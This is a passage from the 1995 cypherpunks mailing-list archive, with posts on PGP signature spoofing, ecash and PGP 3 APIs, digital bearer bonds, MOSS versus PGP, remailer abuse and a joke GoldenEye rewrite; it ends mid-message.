Pardon me, but what was the point of that last comment?  It is an obvious
statement of fact that yes, IF IF IF somebody had a secret key AND password,
he could duplicate a signature.  

Digital signatures allow a person to exclude others from being able to sign
messages as if they are from him.  True, a person could simply publish his
secret key and password, at which point everyone could sign notes as if they
came from him, but that wouldn't be "interesting" because most people would
have no reason to do so.

>Signing with PGP is just not a solution.

It is, apparently, in the vast majority of possible situations.  Why would
you even try to disagree?

Oh, yes, I forgot... you're Detweiler.


 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Sun, 19 Nov 1995 13:15:27 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: (CANADIAN PRESS REPORTS)
In-Reply-To: <199511190440.UAA01341@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951118235430.9209A-100000@kinks>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Sat, 18 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> On Sat, 18 Nov 1995, jim bell wrote:
> 
> Most people believe THAT a digital signature is evidence that I am who my
> signature _says_ I am when it really doesn't do that at all.  It isn't
> reliable at all. 
> 
> Unfortunately, I've learned the hard way NOT to do that.  Digital 
> signatures don't prevent spoofing.
> 
> In fact, I think that thinking something is secure when it isn't leads 
> to even more trouble, and could even lead to many tragedies.
> 
> In a nutshell, here's the problem.
> 
> If someone takes my pgp secret keyring and my password, then they can 
> sign a message *digitally* so that people believe the spoofed message is 
> really from me.  In fact, since most people tend to rely on a pgp message 
> far more than a non-pgp message, most people would be absolutely 
> convinced that the message was in fact from me.
> 
> Signing with PGP is just not a solution.

  I am planning on changing pine (a mail program on the Unix) to use PGP 
and RIPEM directly, and this is one of the issues I am dealing with.  The 
fact is that if you let someone get your secret keyring and password then 
that is your problem, as both should be secure, esp your password.
  What I am hoping to do is just have every message that is to be signed 
to be signed with the thumbprint (hash?) of the message, and this will be 
put at the bottom of each message, every time, so that it protects from 
any messages being changed, and verifies who sent the message.
  Again we go back to the fact that the weakest link here is *you* not 
PGP.
  Take care and have fun.  BTW: Once I am done this version of Pine will 
be export controlled it sounds like. :(

James Black
black@suntan.eng.usf.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@wero.byu.edu>
Date: Sun, 19 Nov 1995 17:23:13 +0800
To: cypherpunks@toad.com
Subject: [NOISE] REWRITE! : GoldenEye
In-Reply-To: <199511180406.XAA18908@bb.hks.net>
Message-ID: <ML-2.0.816771664.7349.don@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Just got back from the new Pierce-Brosnan-as-007 flick.
> It had a few typical "hacker" stereotypes, and a couple
> of interesting crypto relevant references.

Here's the cypherpunk rewrite of the movie... 

> * Boris, the stereotypical hacker, was hacking through American
> banks.  A screen had the words "Department of Justice" and the
> DoJ logo; underneath were the words "Clipper Chip" and a list
> of banks.

...bought the clipper codes from some guy at the DOJ for $100.
(gets a discount rate - normal rate is $200)

> * The archvillian's plan involved a massive money transfer and
> an EMP pulse; he very briefly explained the effects of what
> would happen if every computer in London were rendered non-
> functional.  Possible crypto-anarchy bits.

No need.

All the banks are using DES, which has suddenly become strong again.
(only for another 10 years, of course)

> * Boris should learn the value of strong passphrases.  His
> password for the massive mainframe which will be used in the
> archvillain's scheme is a five-letter dictionary word, which
> didn't change (and it was used on two different computers),
> and he revealed it indirectly (it was a word puzzle).

..hacked the account from some guy in Microsloth network security,
who doesn't know yet that anyone else is using it.

> * A few on-computer-screen references to "encryption".
> 
> * Boris and the mastermind kept bantering about "breaking codes."

It really is annoying to try to break 40bit keys realtime. Why couldn't
they have been only 32 bits or something...

> * Boris' computer in Russia - in his apartment - has a domain
> ending in ".comp.math.edu"; when his screen lights up with
> the words "INCOMING EMAIL" he goes into a live chat (complete
> with graphics).

Using Weidei's TCP tunneler to submarine his computer so that it
_REALLY_IS_ under that domain. (After all, someone would probably
suspect kgb.com or UofHack.edu.ussr domains)

Re chat with graphics: isn't X great?! Have to remember to hack
into a T3 though, this lag is really slowing the feed down... Makes
the movie longer, ya know. Plus, techies will get a thrill if movie
shows doom being played remotely.

There you have it. Suitable for any cryptoanarchists' night out.

Don


PS: Anyone know about ML, the IMAP mail program? Just installed the
new version at home and noticed I haven't seen the PGP hooks in the
configuration like I did on earlier versions. Hmmmmmmmmmmmmmmmmmmm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 19 Nov 1995 18:31:58 +0800
To: cypherpunks@toad.com
Subject: reputations: discussions and meta-discussions
Message-ID: <199511191017.CAA27805@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 18 Nov 1995, Bill Stewart wrote:
 
> Here's the new entity's key, signed :-)  I haven't added it to the
> PGP key servers; I'll leave that up to you...

As we know, a public key certificate is a binding between the key and
some attribute, as asserted by the signer.  In this case you have asserted
a binding between my key and the string "a new entity, as yet unnamed".
I don't understand why you did this.  Would you please explain?

The only reason I can think of is that you wanted to provide evidence
for the key's creation date by timestamping it.  If that was the case,
I thank you.  But in the future, to avoid confusion, perhaps you can 
create a new ID "timestamp" for the key and sign that instead.

 -------------

On a different subject, given the likelihood of an increasing number 
of new identities showing up on this list, I propose that we create 
a new mailing list (cypherpunks-reputations) devoted to
the discussion of reputations of cypherpunks participants.  A significant
number of posts on cypherpunks are already discussions of this sort.  I
believe it would be benificial to create a seperate channel for these
meta-discussions so they do not interfere with regular cypherpunk topics.

By encouraging discussions about reputations of specific entities, we
may also gain some insight on the general properties of reputation systems.
In this sense by creating this new list we create an interesting
self-referential loop -- cypherpunks-reputations contains meta-discussions
about cypherpunks, which in turn contains meta-discussions about 
cypherpunks-reputations.

Examples of posts appropriate for this new mailing list would include:
* knowledge, intelligence, style and quirks of cypherpunks participants
* exchange of keys and certificates
* speculation on connections between entities
* kill file entry recommendations

I do not have the physical resources to serve such a mailing list, so
I hope someone who does will volunteer.

 - keyid D072FC19 (still unnamed)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMK8CnY2Fr67QcvwZAQGUJgP9G8ER/qH8OKvSbOtPYwaDQMkVyKFWafxH
Ukbm0lKgCwS97cEKufxJH49VCRkxrd+t+ia5IRNDxewB1xlcjAKRvp4MK8Ps6MTy
FbhmEpfhB4pnfE5l+e8VnZSoD79j0Sv6C80C48NL6NJNV6PhhTS9B5lXxW/qJv9D
3ZTpTf5AjZI=
=e4DU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 19 Nov 1995 19:33:24 +0800
To: cypherpunks@toad.com
Subject: ecash as pgp
Message-ID: <199511191118.DAA14424@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	This is really frustrating.

	I'm trying to figure out how to use this damn ecash software
to setup a prototype ecash-accepting remailer.

	For one thing, there's no documention.

	Secondly, from what I can tell, it's like PGP. To integrate it
into other software you have to do all sorts of nasty output
parsing. why the hell can't it just produce nice, terse, informative,
UNIX-like output?

	it's late, i'm tired, I'm going to sleep.

	(the party was fun, btw, thanks to everyone who showed up.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cybie@cris.com (Greg Morgan)
Date: Sun, 19 Nov 1995 14:50:09 +0800
To: cypherpunks@toad.com
Subject: VB4 secure mail software
Message-ID: <199511190630.BAA13412@deathstar.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


To the guy who was interested in writing a secure mail program that
worked with MS Exchange in VB4, e-mail me...  I was also thinking of
working on something like that, we could probably work together on
this.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 19 Nov 1995 21:54:46 +0800
To: cypherpunks@toad.com
Subject: Real-life example of why National ID cards won't work
Message-ID: <Pine.SOL.3.91.951119083458.15541B@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
#Date: Fri, 17 Nov 95 16:18:55 PST
#From: medic@netvision.net.il
#To: shomronnews@felix.dircon.co.uk
#Subject: Update 755

SNS News Service  "Interior Ministry Scandal"
November 19, 1995..26 Cheshvan  5756..Number 755..Update from 
Israel ...

Following a report released by Yediot Achronot Newspaper, Interior 
Minister (Labor) Ehud Barak has ordered an immediate investigation 
into allegations of wrong-doing by senior Ministry officials.

The report states that falsified ID cards and other Ministry permits 
are being sold to Arabs. Among those mentioned in the newspaper 
story is Chaim Ben-Atar, the Director of the Ministry's East 
Jerusalem Office, a Member of Knesset, and past members of the 
Mossad and GSS (Shin Bet). 

The Yediot report also alleges that Police officials silenced 
investigations over the past two years (that may have prevented 
terrorist attacks) for the fear of revealing names of top officials 
involved in the Ministry false documentation scam. The 
investigations involved senior officers in the IDF Civil Administration, 
 IDF officers, senior Ministry of the Interior officials and officials in 
the Jerusalem Municipality.  

Some of the allegations:
1) In the East Jerusalem Branch of the Ministry of the Interior, 
Arabs that are not entitled by law may still receive ID cards, travel 
permits to Jordan, and other official documentation in return for 
cash payments or "favors". 

2) Senior officials in the security service of the State have abused 
their connections with the east and west Jerusalem Ministry Offices, 
and have offered permits to travel abroad in return for cash 
payments. The permits were given to Arabs that would not be able 
to obtain them legally. 

3) Interior Ministry workers have received favors and cash payments 
from Arab and Jewish agents in return for issuing travel documents, 
ID cards and passports.

4) Chaim Ben-Atar, the Director of the East Jerusalem Interior 
Ministry Registration Office has provided five Arab residents of 
Gaza with ID cards stating they live in East Jerusalem. 

5)  Ben-Atar also employed an Arab woman during a four-year 
period whose brother is a "religious fanatic activist in East 
Jerusalem". The Arab woman who assisted Ben-Atar has access to 
highly classified information.  She was released from her position 
one year ago for "personal reasons."

6) During an investigation into wrong-doing by the past head of the 
Allenby Bridge crossing, information pointing to wrong-doing by 
other senior IDF officers and Jerusalem Municipality workers was 
uncovered as well. The Ministry chose not to pursue the 
investigation against them.  The cases against them were silenced 
by Interior Ministry officials.  (Yediot Achronot ..11/19..Page 5).

...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tom Bell" <BELL@odo.law.udayton.edu>
Date: Mon, 20 Nov 1995 00:57:00 +0800
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Anonymity and Intellectual Capital
Message-ID: <BDA7F31725@odo.law.udayton.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I've ranted about all this here and elsewhere, how falling semiconductor
> prices, public networks and strong cryptography beget the reemergence of
> bearer certificates, this time in digital form (of which ecash is only the
> prima facie example, the existence proof) and what I call, for lack of a
> better term, a "geodesic", instead of hierarchical, economy.

> Bob Hettinga

Agreed.  What's more, I'll make a similar claim about the legal 
system -- with the rise of alternate dispute resolution systems, it 
too appears to be moving toward a system where law issues less from 
state authorities and more from private ones.  Post's article brings 
out this point well.

As for terminology, I prefer "polycentric."  Originally coined (I 
believe) by Polyani with regard to non-hierarchical societies, it 
works quite well in economic and legal contexts.  A polycentric 
system harbors overlapping authorities in free and open competition.

Tom W. Bell
Assistant Professor 
Law and Technology Program
UD Law School
bell@odo.law.udayton.edu

PGP fingerprint:
78 06 76 AC 32 38 A6 4C  B3 81 F4 1E 2E 27 AC 71





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "GORD JENKINS" <jenkins@fox.nstn.ca>
Date: Mon, 20 Nov 1995 01:50:21 +0800
To: cypherpunks@toad.com
Subject: JIBC Annoucement
Message-ID: <58085.jenkins@fox.nstn.ca>
MIME-Version: 1.0
Content-Type: text/plain



----- Forwarded message begins here -----
From: junhan zhang  <jzhang@ARRAYdev.com>
Thu, 9 Nov 1995 12:11:10 -0500 (EST)
To: gord@array1.arraydev.com
Subject: JIBC Annoucement

________________________________________________________________________

Journal of Internet Banking and Commerce

The goal of this publication is to inform executives, professionals,
entrepreneurs, government employees and other key players on principal
developments and trends in the rapidly evolving electronic commerce area all
over the World.  This free online Journal is a way to keep in touch, to
share information, and to establish business contacts (networking) in the
area of electronic commerce and banking on the Internet.

Journal of Internet Banking and Commerce (JIBC) is primarily devoted to
important announcements, original articles, guest columns, significant
feature presentations from other publications, as well as survey, reviews,
and letters to the editor.  Technical discussions that belong to several
other specialized lists will be kept to the absolute minimum.

Our Journal will be issued no more often than two or three times a week,
limiting material to the absolute minimum.  We are definitely looking for
quality, not quantity.  Needless to say, we will be editing filtering and,
where possible, summarizing, to provide our busy readers only with
substantial information. 

Join this site and learn the trends in electronic commerce.  We promise not
to get too" techie". Not too many fights but lots of good discussion.  We
will need your articles , your letters, your contributions and 
discussion.  

The Journal is maintained and published courtesy of ARRAY Developments of
Ottawa, Canada (http//www.ARRAYdev.com/).  The Publisher, Nahum Goldmann may
be reached at:
  Nahum.Goldmann@ARRAYdev.com.  
Or you can reach the editor and moderator, Gord Jenkins of JENKINS AND
ASSOCIATES INC with any questions, comments or insights at:
  Jenkins@fox.nstn.ca (http//www.infop.com/karoma), Tel. 613-723-1581, 
  FAX 613-723-8938.

Please note that the mailing address for subscribe/unsubscribe is 
 JIBC-request@ARRAYdev.com 
 ************ 
 
World Wide Web information about this mailing list is available via: 
  http://www.arraydev.com/commerce/JIBC/.  
Please send any questions on its maintenance to the list owner :
  <JIBC-admin@ARRAYdev.com>.
Note that ARRAY Development is neither responsible nor necessarily shares
opinions expressed on the list. 
     
This message is sent monthly to the JBCI list.   If mail sent to you cannot
be delivered successfully, your email address will be ruthlessly removed
from the mailing list to prevent bounces for senders.  If you believe you
have been dropped, you can check your subscription status by sending mail 
to: 
    majordomo@ARRAYdev.com 
  Write in the body of message (NOT Subject:) 
 JIBC Your_email_address
 
This command will confirm whether you are on the current list of 
subscribers. 
 
    To subscribe: 
        Send email to JIBC-request@ARRAYdev.com 
        Body of message (NOT Subject:)  subscribe 
    To unsubscribe: 
        Send mail to JIBC-request@ARRAYdev.com 
        Body of message (NOT Subject:)  unsubscribe 
    To contribute to the mailing list: 
        Send mail to JIBC@ARRAYdev.com 
     
  Notice the difference between the two email addresses for subscribing  
(JIBC-request) and posting (JIBC)! 
 
    Send other inquiries to owner JIBC-admin@ARRAYdev.com 
 
    To get a description of all valid commands: 
        Send mail to majordomo@ARRAYdev.com 
        Body of message (NOT Subject:) help 
 
    As our Journal is a moderated list, there is no "digest" facility. 
 ________________________________________________________________________
------ Forwarded message ends here ------
 --
 GORD JENKINS
e maik  JENKINS@fox.nstn.ca
tel 613 794 6735
fax 613 723 8938




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 20 Nov 1995 02:59:32 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymity and Intellectual Capital
In-Reply-To: <Pine.3.89.9511182108.B25524-0100000@tesla.cc.uottawa.ca>
Message-ID: <BXqTeD51w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca writes:
> Barring escrow services, I don't see how contracts (or a lot of
> other laws) could be enforced against these entities when they can simply pop
> in and out of existence (unless they have some physical counterpart, like
> a storefront and merchandise. But then these are easily linkable to True
> Names, unlike software companies, financial services or any other part of
> the info economy.)
>
> The value of a reputation is not particularly high in lots of cases or is
> occasionally worth throwing over for a big one-time scam. (Pyramid scams
> for "reputable" banks)

I think this setup would be totally appropriate for the kinds of services or
merchandize where the buyer may determine at the time of payment whether the
product is what it's billed to be; and needs no warranty or service. In other
words, forger any implied warranty of merchantability and go back to Roman
Law's "caveat emptor".

E.g., if you buy an office chair with a 90-day money back guarantee, you have
90 days to discover defects and return it; you want to be able to get hold of
the seller if you have to. On the other hand, if you buy some shares of IBM,
once you're satisfied that these really are IBM shares and the other party can
sell them, I don't think you need to know anything more about the seller. In
fact, in the real stock market most investors go through 2 brokers and usually
have no idea who you're buying these shares from.

> Ps. I know I could probably look this up, but exactly what are bearer bonds?
> I frequently hear them mentioned when market anonymity and money laundering
> come up.

I haven't seen anyone respond, so I'll ramble on.

A bond is general is an instrument that you buy from an organization that's
trying to raise capital (e.g., a company or a municipality). For example, you
might buy for $600 a bond issued by some, who promises to pay you $50 twice a
year for the next 20 years, and then pay you another $1000 in 20 years (at
maturity). Thus, the organization that issues the bond is borrowing money from
the investor and then pays interest on it. There are slight variations, like
zero-coupon bonds, which don't make a periodic payments, but pay the lump sum
at maturity. I heard that in Europe they have perpetual bonds, which never
mature. (When you buy bonds, you take certain risks: the issuer may default and
not make the promised payments; the interest rates may go up, so you would have
gotten better return in a CD; etc; but that's besides the point.)

Obviously, there's an aftermarket in bonds. An investor may want a $700 now,
rather than $1000 in 20 years, so s/he sells the bond to another investor
(generally, the less time is left to maturity, the smaller the discount from
the par value). How does the organization that issued the bonds know who is
supposed to receive the periodic coupon payments?

In the past, many bonds were "bearer instruments". The owner of the bond had in
his or her physical posession a piece of paper entitling him to the periodic
payments, and transferred the piece of paper to the new owner when the bond was
sold. To collect the payments due the owner, someone had to present the piece
of paper to the bond issuer's agent. The agent would remove a physical coupon
from the piece of paper and give the bearer some money.

(Think of a movie ticket -- its bearer is admitted to see a movie and doesn't
have to identify himself beyond presenting the ticker.)

The problem with this system, from the point of view of the Internal Revenue
Service and other U.S.Gov't agencies, was that the bearer could be anonymous
and did not have to identify his/herself beyond presenting the piece of paper
entitling him/her to the payment. This, they could in principle not declare
these payments on their income tax return and the IRS would have a tough time
tracking them down.

So, about 20 or so years ago, the U.S.Congress required bond issuers to tell
the IRS who received their bond payments. No more anonymity, no more bearer
bonds. (My papers are in the office, so this could in fact be more draconian --
U.S. people prohibited from owning bearer bonds issued by European companies.)

In comparison, if you own stock in a company, your stock certificate is never a
bearer instrument. The corporation knows its shareholders of record, sends them
their dividends, and tells the IRS whom it sent the dividends. When you have an
interest-bearing account at a bank, a SS# is associated with it (or else you
pay penalties) and the IRS is informed about any interest you've earned.

The fact that bearer bonds were outlawed suggests that if and when new ways are
invented to conduct financial transactions that are conductive to tax evasion
(e.g., using anonymous electronic payments), they too may become outlawed.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 20 Nov 1995 08:07:54 +0800
To: warlord@MIT.EDU (Derek Atkins)
Subject: Re: ecash as pgp
In-Reply-To: <199511192339.PAA07631@tess-turbo.mit.edu>
Message-ID: <199511192338.PAA13806@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Cool! I'm really glad you're working in this. Now if only
digicash would release libecash.a, we'd have the infrastructure for
some killer apps.

> 
> > 	Secondly, from what I can tell, it's like PGP. To integrate it
> > into other software you have to do all sorts of nasty output
> > parsing. why the hell can't it just produce nice, terse, informative,
> > UNIX-like output?
> 
> This will change with PGP 3.  There is a very nice, easy API for PGP 3
> which I have been working on for over the last month.  In fact, the
> main processing code is done.  After Tranksgiving I will be working on
> an API document which explains the design and implementation of the
> API.
> 
> IMHO, the API is REALLY EASY to use -- I have a PGP encryption program
> which has all of the main functionality of PGP w.r.t. creating messages,
> and the program is only 250 lines of commented C code.
> 
> The current work is far from complete, but it is getting close!  It
> should make integrating PGP into other programs very simple -- just
> link against libpgp.a. :)
> 
> Enjoy!
> 
> -derek
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 20 Nov 1995 04:58:45 +0800
To: www-buyinfo@allegra.att.com
Subject: e$: What's a digital bearer bond?
Message-ID: <v02120d00acd4d487906b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>Ps. I know I could probably look this up, but exactly what are bearer bonds?
>I frequently hear them mentioned when market anonymity and money laundering
>come up.

It's the little questions which take the longest to answer...

I wrote something here in cypherpunks this year called "The Book Entry /
Certificate Distinction", which you might want to check out in the
archives.

Bearer bonds and bearer certificates (like cash) belong to the bearer. To
be flip, possession is 100% of the law with a bearer bond. Bearer bonds can
be stolen, but they aren't registered anywhere, which makes them useful for
anonymity. All along the bottom of a bearer bond are little squares called
coupons, which you cut out periodically and mail in to the issuer, and
they'll send you back an interest check for that period's interest. Lots of
financial phrases come from bearer bonds. When a bond trader talks about a
bond's interest rate, she may use the word "coupon" interchageably, as in,
"That bond has a 7% coupon.". Meaning, it pays 7% interest per year. Then
there's the phrase "clipping coupons", meaning someone is retired or
independently wealthy and living on their bond interest. Every month the
interest on one bond or other would come due, the coupons clipped and sent
in to the bond's issuer in return for an interest check.

Most securities these days are registered to the owner somewhere, at a
trustee, at the issuer, at a clearinghouse, or some combination of all. In
fact, most securities these days don't exist in physical form at all and
exist only on the books at clearinghouses and brokerages. This is why your
stock broker squalls about "physical delivery" when you ask for a
certificate. About a year ago, we talked about the Depository Trust
Company, the clearing house for the New York Stock Exchange. They have
entire issues there consisting of a single piece of paper in the
clearinghouse vault which are traded entirely on a book entry basis, that
is, only accounting entries are swapped when these securities change hands.

There are several reasons for this. The putative reason is that as taxing
authorities, like the Internal Revenue Service, have relied increasingly on
various cash-flow taxes like the income tax for thier revenue, they have
slowly regulated or legislated bearer bonds out of existence in favor of
registered, and more to the point, book-entry securities.

However, like everything else, law and regulation is really a creature of
technology, and the technological reason that book-entry and consequently
registered certificates are popular is because they're cheaper to handle
locked down in a vault in a clearing house somewhere with the ownership
changing hands by changing offsetting accounting entries at the buyer,
seller, and clearinghouse.

This is a direct consequence of financial systems organized on top of
hierarchical communications networks, which was how all communication
networks were organized before automated switching, and, more to the point,
microprocessor switching made them more and more geodesic in structure. You
might want to check the archives for more of my rants here on that subject.

The thing about digital certificates, of which ecash is only the camel's
nose in the tent, is that while electronic, they're actual bearer
certificates. You get a lot of great non-sequiters when you talk about
them. "Digital bearer certificates", when you can't actually touch them to
"hold" them, Electronic "physical" delivery, and the like.

So, with a digital bearer bond, you would have in effect a bundle of
digital certificates. One would be for the principal and whould be good for
the repayment of that principal on the date the bond was called or the
redemption date, however the bond offering is written. The other
certificates would represent coupons, one for each interest period for the
life of the bond.

These digital certificates, in combination increasingly geodesic networks
enabled by exponentially falling microprocessor prices and strong
cryptography, theoretically allow secure, point-to-point trading of any
security of any amount with instantaneous clearing and cash settlement.

The current hierarchical capital market model, with brokers, "wholesalers",
and central exchanges has been collapsing for decades since the advent of
electronic trading systems (glorified computer bulletin boards, really)
like NASDAQ.  With the coming of digital certificate technology on public
networks, these markets will be "surfacted" into smaller and smaller
concentrations of information and capital.

I have no idea what markets will look like when we "return" to things like
digital bearer bonds, but there's a prima facie example now on the web as
we speak. This week Mark Grant just upgraded his Electronic Cash Market
(ecm)-based cyberbuck (c$) webpage "trading post", so that it will take the
new Mark Twain ecash. That means that it will be possible to trade old
Digicash beta-certificate c$, which sold for 5 cents US per c$, and
instataneously clear and settle them for Mark Twian ecash on-line. No
checks have to be sent between trading parties to buy these certificates
anymore, which should lower transaction costs significantly, not to mention
the float on the money while the trade settled.

It was curious that people were buying these things to begin with, as they
had no value at all except their uniqueness, anonymous electronic
transmissibility, and a promise from Digicash BV to issue only a millon of
them.  Yet now, with the market made infinitely more liquid with the
introduction of real-time cash settlement, things will get, as Alice said,
"curioser and curiouser". Digicash still has some large number of these
things in the "treasury" unissued. I believe these original beta-test
certificates have both payee and payor anonymity, especially if traded
offline, which has been how they've been traded through the ecm.

More fun with numbers.

Cheers,
Bob Hettinga







-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 20 Nov 1995 07:59:06 +0800
To: sameer <sameer@c2.org>
Subject: Re: ecash as pgp
In-Reply-To: <199511191118.DAA14424@infinity.c2.org>
Message-ID: <199511192339.PAA07631@tess-turbo.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 	Secondly, from what I can tell, it's like PGP. To integrate it
> into other software you have to do all sorts of nasty output
> parsing. why the hell can't it just produce nice, terse, informative,
> UNIX-like output?

This will change with PGP 3.  There is a very nice, easy API for PGP 3
which I have been working on for over the last month.  In fact, the
main processing code is done.  After Tranksgiving I will be working on
an API document which explains the design and implementation of the
API.

IMHO, the API is REALLY EASY to use -- I have a PGP encryption program
which has all of the main functionality of PGP w.r.t. creating messages,
and the program is only 250 lines of commented C code.

The current work is far from complete, but it is getting close!  It
should make integrating PGP into other programs very simple -- just
link against libpgp.a. :)

Enjoy!

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 20 Nov 1995 08:09:09 +0800
To: Raph Levien <raph@c2.org>
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511190419.UAA15156@infinity.c2.org>
Message-ID: <199511192347.PAA07661@tess-turbo.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> MIME Object Security Services. It's a technically superior alternative
> to PGP, but one with an uncertain future. It's not being actively
> developed by anyone other than TIS, and their TISMOSS prototype
> implementation is far from being generally usable.

What do you mean by "technically superior"?  What technical merits
does MOSS have over PGP?  It does have a better protocol with which to
integrate it into mailers, but it is only a transmission protocol, not
a security mechanism change.  Worse, MOSS uses X.509, which requires a
lot of overhead for certificates.

On the other hand, the MIME-PGP protocol can provide the same
integration functionality as MOSS and still allow the use of the
simple PGP certification structure that already exists.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Mon, 20 Nov 1995 13:24:08 +0800
To: "'cypherpunks@toad.com>
Subject: Visual Basic 4.0 encryption prog.
Message-ID: <01BAB6A0.6A583C20@king1-12.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


	I just scored a copy of visual basic 4.0 and I was wondering how feasible it would be to write a program for Window$ 95 that would use RSA or IDEA and the Win95 exchange interface. I plan on buying Applied Cryptography probably on Fri. when I get paid.
	My requirements/goals are: 100% compatibility with M$ Exchange, ease of use (Point & Click/ drag & drop) and last but not least, STRONG public key encryption using "off-the shelf
code. 
	So my ??? Is this: Is it possible? Or should I just go out and buy a C++ compiler.
I don't really care about ITAR or any of that other BS, I just won't put MY name on it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@taussky.cs.colorado.edu>
Date: Mon, 20 Nov 1995 08:35:40 +0800
To: Derek Atkins <warlord@mit.edu>
Subject: Re: ecash as pgp
In-Reply-To: <199511192339.PAA07631@tess-turbo.mit.edu>
Message-ID: <199511200021.RAA09388@taussky.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> This will change with PGP 3.  There is a very nice, easy API for PGP 3
> which I have been working on for over the last month.  In fact, the
> main processing code is done.  After Tranksgiving I will be working on
> an API document which explains the design and implementation of the
> API.
> 
> IMHO, the API is REALLY EASY to use -- I have a PGP encryption program
> which has all of the main functionality of PGP w.r.t. creating messages,
> and the program is only 250 lines of commented C code.
> 
> The current work is far from complete, but it is getting close!  It
> should make integrating PGP into other programs very simple -- just
> link against libpgp.a. :)


This is SUCH good news!  May your coding be swift and sure.  Let no
bug delay that wonderful day of public distribution.


Regards,

Bryce



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMK/KF/WZSllhfG25AQG+1gP/apI7RmfRne74IhYf7UELMH0Bm1gTIMe5
JibSxLtVhUE+WsAn5dn/Hwt797M11hc/DqpfDgeWlw7xIUxQKEWKLDGoeChHzFBG
T/7xc4+6H3DA4ZZZSMWDPvM1aJG71u+thnHU4r+fMOO3k9tKJ5YAsfcRD0l4+JL4
3Lp5IjKJbm8=
=vDu5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Tue, 21 Nov 1995 01:21:52 +0800
To: remailer-operators@c2.org
Subject: remailer abuse
Message-ID: <199511200127.AA17430@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


Remailers exist (at least mine does) to make possible the dissemination of
unpopular views. "Unpopular" depends on context; so does "abuse". The line
between "unpopular" and "abuse" is difficult to draw.

On the one hand, the recent "Mr. Pedophile" message seemed intended to make
the recipient uncomfortable or offended probably because of illegitimate
reasons (purportedly, pedophilia). Other messages which cause complaints seem
to be responses to something that the "victim" has done or said somewhere
else. It's tempting to say that a message which lays out in logical fashion
coherent arguments explaining why the "victim's" original message is wrong is
likely to cause discomfort or embarassment but is legitimate, while a message
which says, to quote from a complaint message I received this weekend, 
"Fuck you asshole. I hope you choke on your son's sperm." isn't legitimate
even though it may also cause discomfort or embarassment. So I guess it's 
not so much a message's effect upon its recipient (or its intended effect)
which is legitimate or illegitimate as it is the message's means of doing so.
And that seems really tough to judge, where a remailer operator doesn't
know the context in which a message is sent.

(I do think it's possible that the "Mr. Pedophile" message was sent by another
